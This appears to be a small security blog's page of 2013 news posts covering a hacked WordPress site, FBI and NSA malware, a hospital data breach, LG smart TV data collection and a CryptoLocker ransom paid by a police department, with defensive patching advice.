WordPress - Why it is important to update/patch on a regular basis

The issue of hacked WordPress sites continues to persist, as evidenced by one victimized URL being used to host links to thousands if not millions or billions of shady pharmaceutical sites without the knowledge of the owners.

Security firm Blue Coat recently discovered that the storm.ca site, which belongs to a Canadian internet services company, was being used to host links to more than ten thousand pages of scam sites. After reporting the issue to the storm.ca team, the company quickly addressed the hack and shared some of the details behind it as an object lesson for others.

The sheer scale of the issue is notable: Blue Coat Malware Lab architect Chris Larsen determined that the number of pages that the site was hosting in the background was somewhere between ten thousand and ten billion. “Dozens of pages I tested between 1 and 10001 resolved, but page 9999999999 did not,” he explained in a blog.

The issue is that these kinds of hacks are all too common, given the penetration of WordPress as a content management system. “Even a well-run site can fall victim to hacks focusing on WordPress, which seems to have a lot of weak links -- at least, judging by the amount of compromised sites we see in our logs each day,” Larsen said.

In this case, the intrusion took place when someone uploaded a PHP file manager script via a hole in the "wp_mailinglist" plugin. From there, the attackers could upload anywhere the "nobody" user was allowed to write.

“This way, the attackers didn't need to literally load 10,000 or more junk pages onto the server -- that's the sort of thing that gets noticed! “ Larsen said. “They could simply generate the pages as needed.”

The pages redirected visitors to pages for presumably bogus online pharmacies, which typically offer drugs like Viagra without a prescription.

Pharmacy scams – which, ironically, often feature “discount” prescriptions from Canadian online drug stores – typically attempt to separate desperate consumers from their money on a number of different fronts. Most offers selling medicines or drugs are designed to steal credit card details or to download damaging files (like spyware and key-loggers) onto a computer. Some just take the money and don’t deliver the goods. And in some cases, product is delivered but isn’t the real thing. In some cases, the medicines or other products may even damage the victim’s health.

As a guide for other sites, the storm.ca team shared its remediation (and on-going maintenance) steps: it removed or disabled unused plugins, and modified its Apache configuration to not allow the PHP engine to run on any files within the wp-content/uploads tree, so even if someone can upload arbitrary files in there, they won't be easily executable.

The team also disallowed write permissions on the wp-contenttree as well as the allow_url_fopen and allow_url_includein php.ini. “It's convenient to allow WordPress to be able to self-update plugins, but not at the cost of having the whole directory tree forced to be writable by the server,” Larsen noted.

And, the team recommended the common-sense step of upgrading WordPress and all plugins to their latest versions.

Site operators should take note. Pharmacy scams are tried and true, Larsen pointed out: BlueCoat’s first internal blog post more than five years ago dealt with a hacked website (belonging to the government of Ghana) which was hosting links to, among other things, pharmaceutical sites. “However, the good old Viagra-SEP networks haven't gone away,” Larsen said.

Law Enforcement using Malware to SPY via Webcam


The Federal Bureau of Investigation, or FBI, controls a computer team, which uses malware to keep tabs on suspects, and has the ability to secretly turn on a webcam, according to a report about the agency’s search of a man called “Mo,” who is said to have used different forms of Internet communication to issue bomb threats across the United States last year.

Court documents showed that Mo, allegedly an Iranian, used to communicate through e-mail, video chat and Internet-based phone services without revealing his true identity, and was adept at covering his tracks. To zero in on such suspects, the FBI decided to call on its hackers to put together a piece of malware that was then delivered to Mo’s Yahoo e-mail account. The goal was to obtain information about Mo’s Internet usage and help investigators find his location, the Washington Post reported.

“We have transitioned into a world where law enforcement is hacking into people’s computers, and we have never had public debate,” Christopher Soghoian, principal technologist for the American Civil Liberties Union, told the Post. “Judges are having to make up these powers as they go along.”

According to the Post, the most common delivery mechanism is a simple phishing attack. When the suspect hits a link sent to his inbox by the FBI, it connects to a computer at the agency’s offices in Quantico, Va., and downloads the malicious software that allows the authorities to spy on the suspect through his webcam even without its indicator light turning on.

In Mo’s case, however, the FBI-backed hackers could not turn up much about him. Mo did click on the link that was sent to him, but the tool malfunctioned and “never actually executed as designed.” The only key information that the investigators managed to obtain was that Mo appeared to be in Tehran.

Meanwhile, as the Post noted, such types of online surveillance have pushed the boundaries of the constitutional limits on searches and seizures. According to the report, critics compare it to a physical search that seizes the entire contents of a home, rather than just those items that could be linked to a particular crime.

“You can’t just go on a fishing expedition,” Laura K. Donohue, a Georgetown University law professor who reviewed the court ruling on FBI surveillance software in Mo’s case, told the Post. “There needs to be a nexus between the crime being alleged and the material to be seized. What they are doing here, though, is collecting everything.”

While a federal magistrate in Denver approved sending the malware to Mo’s computer last year, another federal magistrate in Houston rejected an FBI plan in April to send surveillance software to a suspect in a different case, on grounds that it was “extremely intrusive” and could violate the Fourth Amendment.


The Next Question is..Will anti-malware software discover and remove LAW ENFORCEMENT sponsored malware?


Since we learned that the NSA has surreptitiously weakened Internet security so it could more easily eavesdrop, we've been wondering if it's done anything to antivirus products. Given that it engages in offensive cyberattacks -- and launches cyberweapons like Stuxnet and Flame -- it's reasonable to assume that it's asked antivirus companies to ignore its malware. (We know that antivirus companies have previously done this for corporate malware.)

My guess is that the NSA has not done this, nor has any other government intelligence or law enforcement agency. My reasoning is that antivirus is a very international industry, and while a government might get its own companies to play along, it would not be able to influence international companies. So while the NSA could certainly pressure McAfee or Symantec -- both Silicon Valley companies -- to ignore NSA malware, it could not similarly pressure Kaspersky Labs (Russian), F-Secure (Finnish), or AVAST (Czech). And the governments of Russia, Finland, and the Czech Republic will have comparable problems.

Even so, I joined a group of security experts to ask antivirus companies explicitly if they were ignoring malware at the behest of a government. Understanding that the companies could certainly lie, this is the response so far: no one has admitted to doing so.  Original post by Bruce Schneier @ https://www.schneier.com/blog/archives/2013/12/how_antivirus_c.html

Up until this moment, only a handful of the vendors have replied ESET, F-Secure, Norman Shark, Kaspersky, Panda and Trend Micro. All of the responding companies have confirmed the detection of state sponsored malware, e.g. R2D2 and FinFisher. Furthermore, they claim they have never received a request to not detect malware. And if they were asked by any government to do so in the future, they said they would not comply. All the aforementioned companies believe there is no such thing as harmless malware.



90,000 Patients Data Compromised


The University of Washington Medical Center (UW Medicine) was breached in October, with data of up to 90,000 patients of the Harborview Medical Center and University of Washington Medical Center affected. No medical data was stolen, but SSNs may have been lost.

UW Medicine announced last week that up to 90,000 patients may have had personal data stolen. It stressed that health data was not involved. "Based on the results of an internal investigation, it is believed that patient information was not sought or targeted. However, the malware accessed the data files of roughly 90,000 Harborview Medical Center and University of Washington Medical Center patients."

Nevertheless, what was stolen is rich pickings for identity thieves: "name, medical record number, other demographics (which may include address, phone number), dates of service, charge amounts for services received at UW Medicine, Social Security Number or HIC (Medicare) number, date of birth."

The attack occurred in early October (2 October according to the Seattle Times) when an employee opened an email with a malicious attachment. "The malware took control of the computer, which had patient data stored on it. UW Medicine staff discovered this incident the following day and immediately took measures to prevent any further malicious activity."

UW Medicine has referred the matter to the FBI (although it doesn't say when it did so). It began mailing the affected patients last week, and notes that "patients may be contacted by the FBI as part of its investigation." On the basis of this announcement, it has taken around eight weeks from learning of the breach to notifying patients – and it made the notification one the eve of Thanksgiving, one of America's most important holidays.

King 5 News reports on the reaction of one patient to the UW mailing. "'The delay in letting us know is appalling, if it happened October 2nd why are we just being notified the day after Thanksgiving", Patricia Shiras said." The letter indicates that social security numbers and financial information were not compromised. The website, however, specifically includes SSNs. “I think my social security number and financial information are compromised and they're trying to cover it up” said Shiras.

Komo News also quotes an unhappy patient. Susan Phillips, whose last contact with the hospital was in 2008, received one of the letters. "I opened it up and I read this and I just got furious," she said. "I don't have a word for it right now... Waiting until the day before Thanksgiving to do a bulk mailing?"

According to the Seattle Times, UW Medicine spokeswoman Tina Mankowski said it had taken more than a month "to analyze the activity and figure out which patients are most at risk of identity theft." She also said that it is "UW policy that if more than 500 accounts are compromised in an identity-theft attempt, the UW reports the incident to the media."

Are SMART TV's Watching You?

Is your internet connected TV sending your viewing habits over to the manufacture? The post below illustrates just that. Not only are the channels you’re watching being sent, but the filenames on any external media (USB stick) are also sent. The findings below pertain to an LG SMART TV.  The illustration below shows the preference screen....



After some investigation, a rather creepy corporate video advertising their data collection practices to potential advertisers was found. It's quite long but a sample of their claims are as follows:

LG Smart Ad analyses users favourite programs, online behaviour, search keywords and other information to offer relevant ads to target audiences. For example, LG Smart Ad can feature sharp suits to men, or alluring cosmetics and fragrances to women.
Furthermore, LG Smart Ad offers useful and various advertising performance reports. That live broadcasting ads cannot. To accurately identify actual advertising effectiveness.

In fact, there is an option in the system settings called "Collection of watching info:" which is set ON by default.  This setting requires the user to scroll down to see it and, unlike most other settings, contains no "balloon help" to describe what it does.


It turns out that viewing information appears to be sent regardless of whether this option is set to On or Off.  A unique device ID is transmitted, along with the Channel name "BBC NEWS" and a unique device ID. This information appears to be sent unencrypted and in the clear to LG every time you change the channel, even if you have gone to the trouble of changing the setting above to switch collection of viewing information off. Not only is the channel your watching sent to LG but the the filenames of any files stored on an external USB are sent.  While is it understood why LG wants to display ads and gather "viewer watching data", it is hardly understood why LG wants to know what is on your USB media???


Original research and more information is found @ http://doctorbeet.blogspot.co.uk/2013/11/lg-smart-tvs-logging-usb-filenames-and.html

Police Agency hit with CRYPTOLOCKER virus

One of the most-dreaded computer infections out there is ransomware, which locks up one’s system and renders files unusable until a set amount is paid to the hackers responsible for it. In other words, it amounts to little more than extortion, and law enforcement generally recommends that infected users simply bite the bullet and move on rather than pay the ransom. On


Nov. 10, the Swansea, Mass., police department decided to eschew best practices, ponying up a significant payment to criminals.


Recently afflicted with the notorious CryptoLocker ransomware, the department paid two Bitcoins to liberate its files, which was the equivalent that day of $750.

Swansea Police Lt. Gregory Ryan told the local Fall River Herald Tribune that no files were compromised and that the police report/booking software was unaffected by the attack. However, the lack of cyber-education was clear in his other comments: “It was an education for those who had to deal with it,” he said. “[The virus] is so complicated and successful that you have to buy these Bitcoins, which we had never heard of.”

The Swansea Police Department was hit on Nov. 6; and it bought the key and decrypted the files on Nov. 10. Since then it has improved its anti-virus protection, but Ryan noted that he believes “there is no foolproof way to lock your system down.”

CryptoLocker differs from earlier types of ransomware, which could be cleaned off of machines fairly easily by professionals, so that files could be recovered. This virus offers essentially no remediation path without time-consuming and painstaking efforts. Ingeniously, it uses a public key to encrypt a variety of file types such as images, documents and spreadsheets, on all drives and in all folders it can access from the compromised computer.

The malware then offers to trade money for a private, machine-specific key to unlock the encrypted files. A pay page with a countdown clock pops up, giving victims a limited time to buy back the private key for the data.

The two-Bitcoin ransom seems to be the norm for the malware, which, as an online currency, has a fluctuating valuation. Last month two Bitcoins were worth half of what they are this week. But regardless of the amount, if left unpaid, the criminals will destroy the private key after the time specified, meaning that it’s lost forever, and that the files are incapable of being recovered through typical computer software techniques.

On the other hand, there’s no guarantee that the perpetrators would honor the payment in any event. Though in Swansea PD’s case, they did.

CryptoLocker is spreading rapidly, and was recently reported to be hitting millions in the UK via a spam vector. More locally, Matt Fernandes, owner of local Somerset, Mass.-based computer shop WaveOne Technologies, told the Herald News that he’s seeing five to 10 customers come in per week with the infection. He called the virus the “worst I’ve ever seen.”


Here is our story dealing with a local business that was infected..


We're making TOO MUCH CASH, say CryptoLocker scum in ransom price cut. 11/25/13

NSA Infected 50000 Systems with MALWARE


A new slide culled from the trove of documents leaked by Edward Snowden shows where the NSA placed malware on more than 50,000 computer networks worldwide, according to Dutch media outlet NRC.

The NSA management presentation slide from 2012 shows a world map spiderwebbed with "Computer Network Exploitation" access points.

Like all the NSA slides we've seen so far, this one is unlikely to win a Powerpoint beauty pageant anytime soon.

Not that this should distract anyone from the profoundly disturbing implications of this US government malware map that's being reported by a Dutch news agency -- an outlet to which the US government gave a "no comment."

Translated from Dutch:

    The American intelligence service -- NSA -- infected more than 50,000 computer networks worldwide with malicious software designed to steal sensitive information.

    Documents provided by former NSA employee Edward Snowden and seen by this newspaper, prove this.

    (...) The NSA declined to comment and referred to the US Government. A government spokesperson states that any disclosure of classified material is harmful to our national security.

An NSA Web page that outlines the agency's Computer Network Operations program describes Computer Network Exploitation, or CNE, as a key part of the program's mission and says CNE "includes enabling actions and intelligence collection via computer networks that exploit data gathered from target or enemy information systems or networks."

In late August, The Washington Post reported on the NSA's "hacking unit" called Tailored Access Operations (TAO).

The Post wrote:

    According to a profile by Matthew M. Aid for Foreign Policy, it's a highly secret but incredibly important NSA program that collects intelligence about foreign targets by hacking into their computers, stealing data, and monitoring communications.

    (...) Dean Schyvincht, who claims to currently be a TAO Senior Computer Network Operator in Texas, might reveal the most about the scope of TAO activities.

    He says the 14 personnel under his management have completed "over 54,000 Global Network Exploitation (GNE) operations in support of national intelligence agency requirements."

This is one letter away from being exact.

On the NSA's network ops page, there is no program with the acronym GNE -- only CNE and,

    Computer Network Attack (CNA): Includes actions taken via computer networks to disrupt, deny, degrade, or destroy the information within computers and computer networks and/or the computers/networks themselves.

    Computer Network Defense (CND): Includes actions taken via computer networks to protect, monitor, analyze, detect, and respond to network attacks, intrusions, disruptions, or other unauthorized actions that would compromise or cripple defense information.

Across the newly published slide top and bottom a stripe reads, "REL TO USA, AUS, CAN, GBR, NZL."

These are the  so-called Five Eyes nations -- the U.S., U.K., Canada, Australia, and New Zealand -- that share intelligence.

Last week, the very same Five Eyes nations moved to oppose the United Nations' anti-surveillance, right-to-privacy draft resolution called "The Right to Privacy in the Digital Age."

Security researchers online are speculating that telecoms were the most likely targets for the malware.

    Only 50k milware installations globally? Must be restricted to the telcos, ISPs, banks, etc that allow for bulk collection.
    -- the grugq (@thegrugq) November 23, 2013

They may not be too far off the mark.

NRC cites an example of Britain's NSA counterpart, GCHQ, being found to use spoofed LinkedIn pages to install surveillance malware on target computers in Belgium telecom, Belgacom (translated):

    One example of this type of hacking was discovered in September 2013 at the Belgium telecom provider Belgacom.

    For a number of years the British intelligence service -- GCHQ -- has been installing this malicious software in the Belgacom network in order to tap their customer's telephone and data traffic.

    The Belgacom network was infiltrated by GCHQ through a process of luring employees to a false Linkedin page.

NRC concludes its article by telling us that the Dutch government's intelligence service has its own hacking unit, but that it's prohibited by law from engaging in the type of operations that the CNE slide suggests the NSA carried out.

This story originally appeared as "NSA malware infected over 50,000 computer networks worldwide" on ZDNet.

Subscribe to our Newsletter

Search ALL Articles

Managed V. Non-Managed



US-CERT Latest Warnings

Latest US-CERT Released Warnings

Posted Articles